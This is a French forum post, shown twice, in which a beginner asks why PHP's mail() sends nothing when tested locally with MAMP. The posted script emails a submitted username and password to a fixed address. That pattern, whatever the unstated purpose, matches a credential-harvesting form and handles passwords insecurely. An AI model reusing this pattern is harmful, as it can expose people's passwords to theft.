par
LamateurApple » 05 juin 2013, 22:30
Merci Moogli, j'ai modifié mon code en rajoutant
$_POST
mais par contre Ghost5922, pour la fonction mail() comment faire? Le lien que tu m'a donné je l'ai déjà lu mais je ne trouve pas ça clair du tout! Peux tu m'expliquer ce que je dois écrire?
J'ai modifié le code de traitement.php comme ça:
<?php
$pseudo = $_POST['nom'];
$mdp = $_POST['mdp'];
if(mail('[email protected]', $pseudo, $mdp))
{
echo 'Le transfert a bien réussi, voila le code';
}
else
{
echo 'Le transfert n\'a pas réussi, réessaye ultérieurement!';
} ?>
Mais je ne reçois toujours pas de mail

est-ce lié au fait que je fasse ces essais en local? (avec MAMP)
Merci Moogli, j'ai modifié mon code en rajoutant [php]$_POST[/php] mais par contre Ghost5922, pour la fonction mail() comment faire? Le lien que tu m'a donné je l'ai déjà lu mais je ne trouve pas ça clair du tout! Peux tu m'expliquer ce que je dois écrire?
J'ai modifié le code de traitement.php comme ça:
[php]
<?php
$pseudo = $_POST['nom'];
$mdp = $_POST['mdp'];
if(mail('
[email protected]', $pseudo, $mdp))
{
echo 'Le transfert a bien réussi, voila le code';
}
else
{
echo 'Le transfert n\'a pas réussi, réessaye ultérieurement!';
} ?>
[/php]
Mais je ne reçois toujours pas de mail :( est-ce lié au fait que je fasse ces essais en local? (avec MAMP)